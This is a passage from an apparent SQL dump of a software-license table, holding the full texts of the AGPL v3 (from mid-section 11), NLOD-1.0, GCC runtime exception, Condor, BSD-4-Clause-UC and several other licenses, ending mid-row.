acquired or hereafter acquired, that would\nbe infringed by some manner, permitted by this License, of making, using,\nor selling its contributor version, but do not include claims that would be\ninfringed only as a consequence of further modification of the contributor\nversion. For purposes of this definition, \"control\" includes the right to\ngrant patent sublicenses in a manner consistent with the requirements of this\nLicense.\n\nEach contributor grants you a non-exclusive, worldwide, royalty-free patent\nlicense under the contributor\'s essential patent claims, to make, use, sell,\noffer for sale, import and otherwise run, modify and propagate the contents\nof its contributor version.\n\nIn the following three paragraphs, a \"patent license\" is any express agreement\nor commitment, however denominated, not to enforce a patent (such as an express\npermission to practice a patent or covenant not to s ue for patent infringement).\nTo \"grant\" such a patent license to a party means to make such an agreement\nor commitment not to enforce a patent against the party.\n\nIf you convey a covered work, knowingly relying on a patent license, and the\nCorresponding Source of the work is not available for anyone to copy, free\nof charge and under the terms of this License, through a publicly available\nnetwork server or other readily accessible means, then you must either (1)\ncause the Corresponding Source to be so available, or (2) arrange to deprive\nyourself of the benefit of the patent license for this particular work, or\n(3) arrange, in a manner consistent with the requirements of this License,\nto extend the patent\n\nlicense to downstream recipients. \"Knowingly relying\" means you have actual\nknowledge that, but for the patent license, your conveying the covered work\nin a country, or your recipient\'s use of the covered work in a country, would\ninfringe one or more identifiable patents in that country that you have reason\nto believe are valid.\n\nIf, pursuant to or in connection with a single transaction or arrangement,\nyou convey, or propagate by procuring conveyance of, a covered work, and grant\na patent license to some of the parties receiving the covered work authorizing\nthem to use, propagate, modify or convey a specific copy of the covered work,\nthen the patent license you grant is automatically extended to all recipients\nof the covered work and works based on it.\n\nA patent license is \"discriminatory\" if it does not include within the scope\nof its coverage, prohibits the exercise of, or is conditioned on the non-exercise\nof one or more of the rights that are specifically granted under this License.\nYou may not convey a covered work if you are a party to an arrangement with\na third party that is in the business of distributing software, under which\nyou make payment to the third party based on the extent of your activity of\nconveying the work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory patent\nlicense (a) in connection with copies of the covered work conveyed by you\n(or copies made from those copies), or (b) primarily for and in connection\nwith specific products or compilations that contain the covered work, unless\nyou entered into that arrangement, or that patent license was granted, prior\nto 28 March 2007.\n\nNothing in this License shall be construed as excluding or limiting any implied\nlicense or other defenses to infringement that may otherwise be available\nto you under applicable patent law.\n\n 12. No Surrender of Others\' Freedom.\n\nIf conditions are imposed on you (whether by court order, agreement or otherwise)\nthat contradict the conditions of this License, they do not excuse you from\nthe conditions of this License. If you cannot convey a covered work so as\nto satisfy simultaneously your obligations under this License and any other\npertinent obligations, then as a consequence you may\n\nnot convey it at all. For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey the\nProgram, the only way you could satisfy both those terms and this License\nwould be to refrain entirely from conveying the Program.\n\n 13. Remote Network Interaction; Use with the GNU General Public License.\n\nNotwithstanding any other provision of this License, if you modify the Program,\nyour modified version must prominently offer all users interacting with it\nremotely through a computer network (if your version supports such interaction)\nan opportunity to receive the Corresponding Source of your version by providing\naccess to the Corresponding Source from a network server at no charge, through\nsome standard or customary means of facilitating copying of software. This\nCorresponding Source shall include the Corresponding Source for any work covered\nby version 3 of the GNU General Public License that is incorporated pursuant\nto the following paragraph.\n\nNotwithstanding any other provision of this License, you have permission to\nlink or combine any covered work with a work licensed under version 3 of the\nGNU General Public License into a single combined work, and to convey the\nresulting work. The terms of this License will continue to apply to the part\nwhich is the covered work, but the work with which it is combined will remain\ngoverned by version 3 of the GNU General Public License.\n\n 14. Revised Versions of this License.\n\nThe Free Software Foundation may publish revised and/or new versions of the\nGNU Affero General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to address\nnew problems or concerns.\n\nEach version is given a distinguishing version number. If the Program specifies\nthat a certain numbered version of the GNU Affero General Public License \"or\nany later version\" applies to it, you have the option of following the terms\nand conditions either of that numbered version or of any later version published\nby the Free Software Foundation. If the Program does not specify a version\nnumber of the GNU Affero General Public License, you may choose any version\never published by the Free Software Foundation.\n\nIf the Program specifies that a proxy can decide which future versions of\nthe GNU Affero General Public License can be used, that proxy\'s public statement\nof acceptance of a version permanently authorizes you to choose that version\nfor the Program.\n\nLater license versions may give you additional or different permissions. However,\nno additional obligations are imposed on any author or copyright holder as\na result of your choosing to follow a later version.\n\n 15. Disclaimer of Warranty.\n\nTHERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE\nLAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR\nOTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY OF ANY KIND, EITHER\nEXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS\nTO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM\nPROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR\nCORRECTION.\n\n 16. Limitation of Liability.\n\nIN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL\nANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS THE PROGRAM\nAS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL,\nINCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO\nUSE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED\nINACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE\nPROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), EVEN IF SUCH HOLDER OR OTHER\nPARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\nIf the disclaimer of warranty and limitation of liability provided above cannot\nbe given local legal effect according to their terms, reviewing courts shall\napply local law that most closely approximates an absolute waiver of all civil\nliability in connection with the Program, unless a warranty or assumption\nof liability accompanies a copy of the Program in return for a fee. END OF\nTERMS AND CONDITIONS\n\nHow to Apply These Terms to Your New Programs\n\nIf you develop a new program, and you want it to be of the greatest possible\nuse to the public, the best way to achieve this is to make it free software\nwhich everyone can redistribute and change under these terms.\n\nTo do so, attach the following notices to the program. It is safest to attach\nthem to the start of each source file to most effectively state the exclusion\nof warranty; and each file should have at least the \"copyright\" line and a\npointer to where the full notice is found.\n\n<one line to give the program\'s name and a brief idea of what it does.>\n\nCopyright (C) <year> <name of author>\n\nThis program is free software: you can redistribute it and/or modify it under\nthe terms of the GNU Affero General Public License as published by the Free\nSoftware Foundation, either version 3 of the License, or (at your option)\nany later version.\n\nThis program is distributed in the hope that it will be useful, but WITHOUT\nANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\nFOR A PARTICULAR PURPOSE. See the GNU Affero General Public License for more\ndetails.\n\nYou should have received a copy of the GNU Affero General Public License along\nwith this program. If not, see <http s ://www.gnu.org/licenses/>.\n\nAlso add information on how to contact you by electronic and paper mail.\n\nIf your software can interact with users remotely through a computer network,\nyou should also make sure that it provides a way for users to get its source.\nFor example, if your program is a web application, its interface could display\na \"Source\" link that leads users to an archive of the code. There are many\nways you could offer source, and different solutions will be better for different\nprograms; see section 13 for the specific requirements.\n\nYou should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary. For\nmore information on this, and how to apply and follow the GNU AGPL, see <http\ns ://www.gnu.org/licenses/>.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(182,'WxWindows-exception-3.1','EXCEPTION NOTICE\n\n 1. As a special exception, the copyright holders of this library give permission for additional uses of the text contained in this release of the library as licenced under the wxWindows Library Licence, applying either version 3.1 of the Licence, or (at your option) any later version of the Licence as published by the copyright holders of version 3.1 of the Licence document.\n\n 2. The exception is that you may use, copy, link, modify and distribute under your own terms, binary object code versions of works based on the Library.\n\n 3. If you copy code from files distributed under the terms of the GNU General Public Licence or the GNU Library General Public Licence into a copy of this library, as this licence permits, the exception does not apply to the code that you add in this way. To avoid misleading anyone as to the status of such modified files, you must delete this exception notice from such code and/or adjust the licensing conditions notice accordingly.\n\n 4. If you write modifications of your own for this library, it is your choice whether to permit this exception to apply to your modifications. If you do not wish that, you must delete the exception notice from such code and/or adjust the licensing conditions notice accordingly.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(183,'NLOD-1.0','Norwegian Licence for Open Government Data (NLOD)\n\nPreface of licence\n\nThis licence grants you the right to copy, use and distribute information,\nprovided you acknowledge the contributors and comply with the terms and conditions\nstipulated in this licence. By using information made available under this\nlicence, you accept the terms and conditions set forth in this licence. As\nset out in Section 7, the licensor disclaims any and all liability for the\nquality of the information and what the information is used for.\n\nThis licence shall not impose any limitations on the rights or freedoms of\nthe licensee under the Norwegian Freedom of Information Act or any other legislation\ngranting the general public a right of access to public sector information,\nor that follow from exemptions or limitations stipulated in the Norwegian\nCopyright Act. Further, the licence shall not impose any limitations on the\nlicensee\'s freedom of expression recognized by law.\n\n 1. Definitions\n\n«Database» shall mean a database or similar protected under Section 43 of\nthe Norwegian Copyright Act.\n\n«Information» shall mean texts, images, recordings, data sets or other works\nprotected under Section 1 of the Norwegian Copyright Act, or which are protected\nunder provisions addressing what is referred to as «neighbouring rights» in\nChapter 5 of the Norwegian Copyright Act (including databases and photographs),\nand which are distributed under this licence.\n\n «Copy» shall mean reproduction in any form.\n\n«Licensee» and «you» shall mean natural or legal persons using information\nunder this licence.\n\n«Licensor» shall mean the natural or legal person that makes information available\nunder this licence.\n\n«Distribute» shall mean any actions whereby information is made available,\nincluding to distribute, transfer, communicate, disperse, show, perform, sell,\nlend and rent.\n\n«Use» shall mean one or more actions relevant to copyright law requiring permission\nfrom the owner of the copyright.\n\n 2. Licence\n\nThe licensee, subject to the limitations that follow from this licence, may\nuse the information for any purpose and in all contexts, by:\n\n * copying the information and distributing the information to others,\n\n* modifying the information and/or combining the information with other information,\nand\n\n * copying and distributing such changed or combined information.\n\n* This is a non-exclusive, free, perpetual and worldwide licence. The information\nmay be used in any medium and format known today and/or which will become\nknown in the future. The Licensee shall not sub-license or transfer this licence.\n\n 3. Exemptions\n\n The licence does not apply to and therefore does not grant a right to use:\n\n* information which contains personal data covered by the Norwegian Personal\nData Act unless there is a legitimate basis for the disclosure and further\nprocessing of the personal data\n\n* information distributed in violation of a statutory obligation to observe\nconfidentiality\n\n* information excluded from public disclosure pursuant to law, including information\ndeemed sensitive under the Norwegian National Security Act\n\n* information subject to third party rights which the licensor is not authorised\nto license to the licensee\n\n* information protected by intellectual property rights other than copyright\nand neighbouring rights in accordance with Chapter 5 of the Norwegian Copyright\nAct, such as trademarks, patents and design rights, but this does not entail\nan impediment to use information where the licensor\'s logo has been permanently\nintegrated into the information or to attribute the origin of the information\nin accordance with the article below relating to attribution.\n\nIf the licensor has made available information not covered by the licence\naccording to the above list, the licensee must cease all use of the information\nunder the licence, and erase the information as soon as he or she becomes\naware of or should have understood that the information is not covered by\nthe licence.\n\n 4. Effects of breach of the licence\n\nThe licence is subject to the licensee\'s compliance with the terms and conditions\nof this licence. In the event that the licensee commits a breach of this licence,\nthis will entail that the licensee\'s right to use the information will be\nrevoked immediately without further notice. In case of such a breach, the\nlicensee must immediately and without further notice take measures to cause\nthe infringement to end. Because the right to use the information has been\nterminated, the licensee must cease all use of the information by virtue of\nthe licence.\n\n 5. Attribution\n\nThe licensee shall attribute the licensor as specified by the licensor and\ninclude a reference to this licence. To the extent practically possible, the\nlicensee shall provide a link to both this licence and the source of the information.\n\nIf the licensor has not specified how attributions shall be made, the licensee\nshall normally state the following: «Contains data under the Norwegian licence\nfor Open Government data (NLOD) distributed by [name of licensor]».\n\nIf the licensor has specified that the information shall only be available\nunder a specific version of this licence, cf. Section 10, the licensee shall\nalso state this.\n\nIf the information has been changed, the licensee must clearly indicate that\nchanges have been made by the licensee.\n\n 6. Proper use\n\nThe licensee shall not use the information in a manner that appears misleading\nnor present the information in a distorted or incorrect manner.\n\nNeither the licensor\'s nor other contributors\' names or trademarks must be\nused to support, recommend or market the licensee or any products or services\nusing the information.\n\n 7. Disclaimer of liability\n\nThe information is licensed «as is». The information may contain errors and\nomissions. The licensor provides no warranties, including relating to the\ncontent and relevance of the information.\n\nThe licensor disclaims any liability for errors and defects associated with\nthe information to the maximum extent permitted by law.\n\nThe licensor shall not be liable for direct or indirect losses as a result\nof use of the information or in connection with copying or further distribution\nof the information.\n\n 8. Guarantees regarding data quality and accessibility\n\nThis licence does not prevent the licensor from issuing supplementary statements\nregarding expected or intended data quality and accessibility. Such statements\nshall be regarded as indicative in nature and not binding on the part of the\nlicensor. The disclaimers in Section 7 also apply in full for such indicative\nstatements. Based on separate agreement, the licensor may provide guarantees\nand distribute the information on terms and conditions different from those\nset forth in this licence.\n\n 9. Licence compatibility\n\nIf the licensee is to distribute an adapted or combined work based on information\ncovered by this licence and some other work licensed under a licence compatible\nby contract, such distribution may be based on an appropriate licence compatible\nby contract, cf. the list below.\n\n A licence compatible by contract shall mean the following licences:\n\n * for all information: Open Government Licence (version 1.0),\n\n* for those parts of the information which do not constitute databases: Creative\nCommons Attribution Licence (generic version 1.0, 2.0, 2.5 and unported version\n3.0) and Creative Commons Navngivelse 3.0 Norge,\n\n* for those parts of the information which constitute databases: Open Data\nCommons Attribution License (version 1.0).\n\nThis provision does not prevent other licences from being compatible with\nthis licence based on their content.\n\n 10. New versions of the licence\n\nThe licensee may choose to use the information covered by this licence under\nany new versions of the Norwegian licence for Open Government data (NLOD)\nissued by the responsible ministry (currently the Ministry of Government Administration,\nReform and Church Affairs) when these versions are final and official, unless\nthe licensor when making the information available under this licence specifically\nhas stated that solely version 1.0 of this licence may be used.\n\n 11. Governing law and legal venue\n\nThis licence, including its formation, and any disputes and claims arising\nin connection with or relating to this licence, shall be regulated by Norwegian\nlaw. The legal venue shall be the licensor\'s ordinary legal venue. The licensor\nmay, with regard to intellectual proprietary rights, choose to pursue a claim\nat other competent legal venues and/or based on the laws of the country where\nthe intellectual property rights are sought enforced.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(184,'GCC-exception-3.1','GCC RUNTIME LIBRARY EXCEPTION\n\nVersion 3.1, 31 March 2009\n\nGeneral information: http://www.gnu.org/licenses/gcc-exception.html\n\nCopyright (C) 2009 Free Software Foundation, Inc. <http://fsf.org/>\n\nEveryone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed.\n\nThis GCC Runtime Library Exception (\"Exception\") is an additional permission under section 7 of the GNU General Public License, version 3 (\"GPLv3\"). It applies to a given file (the \"Runtime Library\") that bears a notice placed by the copyright holder of the file stating that the file is governed by GPLv3 along with this Exception.\n\nWhen you use GCC to compile a program, GCC may combine portions of certain GCC header files and runtime libraries with the compiled program. The purpose of this Exception is to allow compilation of non-GPL (including proprietary) programs to use, in this way, the header files and runtime libraries covered by this Exception.\n\n 0. Definitions.\n\n A file is an \"Independent Module\" if it either requires the Runtime Library for execution after a Compilation Process, or makes use of an interface provided by the Runtime Library, but is not otherwise based on the Runtime Library.\n\n \"GCC\" means a version of the GNU Compiler Collection, with or without modifications, governed by version 3 (or a specified later version) of the GNU General Public License (GPL) with the option of using any subsequent versions published by the FSF.\n\n \"GPL-compatible Software\" is software whose conditions of propagation, modification and use would permit combination with GCC in accord with the license of GCC.\n\n \"Target Code\" refers to output from any compiler for a real or virtual target processor architecture, in executable form or suitable for input to an assembler, loader, linker and/or execution phase. Notwithstanding that, Target Code does not include data in any format that is used as a compiler intermediate representation, or used for producing a compiler intermediate representation.\n\n The \"Compilation Process\" transforms code entirely represented in non-intermediate languages designed for human-written code, and/or in Java Virtual Machine byte code, into Target Code. Thus, for example, use of source code generators and preprocessors need not be considered part of the Compilation Process, since the Compilation Process can be understood as starting with the output of the generators or preprocessors.\n\n A Compilation Process is \"Eligible\" if it is done using GCC, alone or with other GPL-compatible software, or if it is done without using any work based on GCC. For example, using non-GPL-compatible Software to optimize any GCC intermediate representations would not qualify as an Eligible Compilation Process.\n\n 1. Grant of Additional Permission.\n\n You have permission to propagate a work of Target Code formed by combining the Runtime Library with Independent Modules, even if such propagation would otherwise violate the terms of GPLv3, provided that all Target Code was generated by Eligible Compilation Processes. You may then convey such a combination under terms of your choice, consistent with the licensing of the Independent Modules.\n\n 2. No Weakening of GCC Copyleft.\n\nThe availability of this Exception does not imply any general presumption that third-party software is unaffected by the copyleft requirements of the license of GCC.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(185,'Imlib2','Imlib2 License\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies of the Software and its Copyright notices. In addition publicly\ndocumented acknowledgment must be given that this software has been used if\nno source code of this software is made available publicly. Making the source\navailable publicly means including the source for this software with the distribution,\nor a method to get this software via some reasonable mechanism (electronic\ntransfer via a network or media) as well as making an offer to supply the\nsource on request. This Copyright notice serves as an offer to supply the\nsource on on request as well. Instead of this, supplying acknowledgments of\nuse of this software in either Copyright notices, Manuals, Publicity and Marketing\ndocuments or any documentation provided with any product containing this software.\nThis License does not apply to any software that links to the libraries provided\nby this software (statically or dynamically), but only to the software provided.\n\nPlease see the COPYING-PLAIN for a plain-english explanation of this notice\nand its intent.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nBE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION\nOF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH\nTHE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(186,'MITNFA','Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nDistributions of all or part of the Software intended to be used by the recipients\nas they would use the unmodified Software, containing modifications that substantially\nalter, remove, or disable functionality of the Software, outside of the documented\nconfiguration mechanisms provided by the Software, shall be modified such\nthat the Original Author\'s bug reporting email addresses and urls are either\nreplaced with the contact information of the parties responsible for the changes,\nor removed entirely.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS\nOR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\nWHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF\nOR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(187,'ANTLR-PD','ANTLR 2 License\n\nWe reserve no legal rights to the ANTLR--it is fully in the public domain.\nAn individual or company may do whatever they wish with source code distributed\nwith ANTLR or the code generated by ANTLR, including the incorporation of\nANTLR, or its output, into commerical software.\n\nWe encourage users to develop software with ANTLR. However, we do ask that\ncredit is given to us for developing ANTLR. By \"credit\", we mean that if you\nuse ANTLR or incorporate any source code into one of your programs (commercial\nproduct, research project, or otherwise) that you acknowledge this fact somewhere\nin the documentation, research report, etc... If you like ANTLR and have developed\na nice tool with the output, please mention that you developed it using ANTLR.\nIn addition, we ask that the headers remain intact in our source code. As\nlong as these guidelines are kept, we expect to continue enhancing this system\nand expect to make other tools available as they are completed.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(188,'SWL','The authors hereby grant permission to use, copy, modify, distribute, and\nlicense this software and its documentation for any purpose, provided that\nexisting copyright notices are retained in all copies and that this notice\nis included verbatim in any distributions. No written agreement, license,\nor royalty fee is required for any of the authorized uses. Modifications to\nthis software may be copyrighted by their authors and need not follow the\nlicensing terms described here, provided that the new terms are clearly indicated\non the first page of each file where they apply.\n\nIN NO EVENT SHALL THE AUTHORS OR DISTRIBUTORS BE LIABLE TO ANY PARTY FOR DIRECT,\nINDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OF THIS SOFTWARE, ITS DOCUMENTATION, OR ANY DERIVATIVES THEREOF, EVEN\nIF THE AUTHORS HAVE BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. THE AUTHORS\nAND DISTRIBUTORS SPECIFICALLY DISCLAIM ANY WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\nPURPOSE, AND NON-INFRINGEMENT. THIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS,\nAND THE AUTHORS AND DISTRIBUTORS HAVE NO OBLIGATION TO PROVIDE MAINTENANCE,\nSUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS.\n\nGOVERNMENT USE: If you are acquiring this software on behalf of the U.S. government,\nthe Government shall have only \"Restricted Rights\" in the software and related\ndocumentation as defined in the Federal Acquisition Regulations (FARs) in\nClause 52.227.19 (c) (2). If you are acquiring the software on behalf of the\nDepartment of Defense, the software shall be classified as \"Commercial Computer\nSoftware\" and the Government shall have only \"Restricted Rights\" as defined\nin Clause 252.227-7013 (c) (1) of DFARs. Notwithstanding the foregoing, the\nauthors grant the U.S. Government and others acting in its behalf permission\nto use and distribute the software in accordance with the terms specified\nin this license.\n\nBY INSTALLING THIS SOFTWARE, YOU ACKNOWLEDGE THAT YOU HAVE READ THIS AGREEMENT,\nTHAT YOU UNDERSTAND IT, AND THAT YOU AGREE TO BE BOUND BY ITS TERMS AND CONDITIONS.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(189,'Condor-1.1','Condor Public License\n\nVersion 1.1, October 30, 2003\n\nCopyright © 1990-2006 Condor Team, Computer Sciences Department, University\nof Wisconsin-Madison, Madison, WI. All Rights Reserved. For more information\ncontact: Condor Team, Attention: Professor Miron Livny, Dept of Computer Sciences,\n1210 W. Dayton St., Madison, WI 53706-1685, (608) 262-0856 or miron@cs.wisc.edu.\n\nThis software referred to as the Condor® Version 6.x software (\"Software\")\nwas developed by the Condor Project, Condor Team, Computer Sciences Department,\nUniversity of Wisconsin-Madison, under the authority of the Board of Regents\nof the University of Wisconsin System and includes voluntary contributions\nmade to the Condor Project (\"Copyright Holders and Contributors and the University\").\nFor more information on the Condor Project, please see http://www.condorproject.org/.\n\nInstallation, use, reproduction, display, modification and redistribution\nof this Software, with or without modification, in source and binary forms,\nare permitted. Any exercise of rights under this license including sublicenses\nby you is subject to the following conditions:\n\n1. Redistributions of this Software, with or without modification, must reproduce\nthis Condor Public License in: (1) the Software, and (2) any user documentation\nor other similar material which is provided with the Software.\n\n \n\n2. Any user documentation included with a redistribution must include the\nfollowing notice:\n\n\"This product includes software from the Condor® Project (http://www.condorproject.org/)\"\n\nAlternatively, if that is where third-party acknowledgments normally appear,\nthis acknowledgment must be reproduced in the Software itself.\n\n3. Any academic report, publication, or other academic disclosure of results\nobtained with this Software will acknowledge this Software\'s use by an appropriate\ncitation.\n\n4. The name Condor® is a registered trademark of the University of Wisconsin-Madison.\nThe trademark may not be used to endorse or promote software, or products\nderived therefrom, and, other than as required by section 2 and 3 above, it\nmay not be affixed to modified redistributions of this Software without the\nprior written approval, obtainable via email to condor-admin@cs.wisc.edu.\n\n5. To the extent that patent claims licensable by the University of Wisconsin-Madison\nare necessarily infringed by the use or sale of the Software, you are granted\na non-exclusive, worldwide, royalty- free perpetual license under such patent\nclaims, with the rights for you to make, use, sell, offer to sell, import\nand otherwise transfer the Software in source code and object code form and\nderivative works. This patent license shall apply to the combination of the\nSoftware with other software if, at the time the Software is added by you,\nsuch addition of the Software causes such combination to be covered by such\npatent claims. This patent license shall not apply to any other combinations\nwhich include the Software. No hardware per se is licensed hereunder.If you\nor any subsequent sub-licensee (a ``Recipient\") institutes patent litigation\nagainst any entity (including a cross-claim or counterclaim in a lawsuit)\nalleging that the Software infringes such Recipient\'s patent(s), then such\nRecipient\'s rights granted (directly or indirectly) under the patent license\nabove shall terminate as of the date such litigation is filed. All sublicenses\nto the Software which have been properly granted prior to termination shall\nsurvive any termination of said patent license, if not otherwise terminated\npursuant to this section.\n\n 6. DISCLAIMER\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS AND THE\nUNIVERSITY \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY, OF SATISFACTORY QUALITY,\nAND FITNESS FOR A PARTICULAR PURPOSE OR USE ARE DISCLAIMED. THE COPYRIGHT\nHOLDERS AND CONTRIBUTORS AND THE UNIVERSITY MAKE NO REPRESENTATION THAT THE\nSOFTWARE, MODIFICATIONS, ENHANCEMENTS OR DERIVATIVE WORKS THEREOF, WILL NOT\nINFRINGE ANY PATENT, COPYRIGHT, TRADEMARK, TRADE SECRET OR OTHER PROPRIETARY\nRIGHT.\n\n 7. LIMITATION OF LIABILITY\n\nTHE COPYRIGHT HOLDERS AND CONTRIBUTORS AND ANY OTHER OFFICER, AGENT, OR EMPLOYEE\nOF THE UNIVERSITY SHALL HAVE NO LIABILITY TO LICENSEE OR OTHER PERSONS FOR\nDIRECT, INDIRECT, SPECIAL, INCIDENTAL, CONSEQUENTIAL, EXEMPLARY, OR PUNITIVE\nDAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, PROCUREMENT OF SUBSTITUTE\nGOODS OR SERVICES, LOSS OF USE, DATA OR PROFITS, OR BUSINESS INTERRUPTION,\nHOWEVER CAUSED AND ON ANY THEORY OF CONTRACT, WARRANTY, TORT (INCLUDING NEGLIGENCE),\nPRODUCT LIABILITY OR OTHERWISE, ARISING IN ANY WAY OUT OF THE USE OF THIS\nSOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.\n\n8. Certain uses and transfers of the Software or documentation, and/or items\nor software incorporating the Condor Software or documentation, may require\na license under U.S. Export Control laws. Licensee represents and warrants\nthat all uses and transfers of the Condor Software or documentation and/or\nany items or software incorporating Condor shall be in compliance with U.S.\nExport Control laws, and Licensee further understands that failure to comply\nwith such export control laws may result in criminal liability to Licensee\nunder U.S. laws.\n\n9. The Condor Team may publish revised and/or new versions of this Condor\nPublic License (``this License\") from time to time. Each version will be given\na distinguishing version number. Once Software has been published under a\nparticular version of this License, you may always continue to use it under\nthe terms of that version. You may also choose to use such Software under\nthe terms of any subsequent version of this License published by the Condor\nTeam. No one other than the Condor Team has the right to modify the terms\nof this License. For more information:\n\nCondor Team\n\nAttention: Professor Miron Livny\n\n7367 Computer Sciences\n\n1210 W. Dayton St.\n\nMadison, WI 53706-1685\n\nmiron@cs.wisc.edu\n\nhttp://pages.cs.wisc.edu/~miron/miron.html\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(190,'BSD-4-Clause-UC','BSD-4-Clause (University of California-Specific)\n\nCopyright [various years] The Regents of the University of California. All\nrights reserved.\n\nRedistribution and use in source and binary forms, with or without modification,\nare permitted provided that the following conditions are met:\n\n1. Redistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright notice,\nthis list of conditions and the following disclaimer in the documentation\nand/or other materials provided with the distribution.\n\n3. All advertising materials mentioning features or use of this software must\ndisplay the following acknowledgement: This product includes software developed\nby the University of California, Berkeley and its contributors.\n\n4. Neither the name of the University nor the names of its contributors may\nbe used to endorse or promote products derived from this software without\nspecific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS \'\'AS IS\'\' AND ANY\nEXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\nWARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.\nIN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\nINCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\nOR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\nLIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\nOR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF\nADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(191,'BSD-4-Clause','Copyright (c) <year> <owner> . All rights 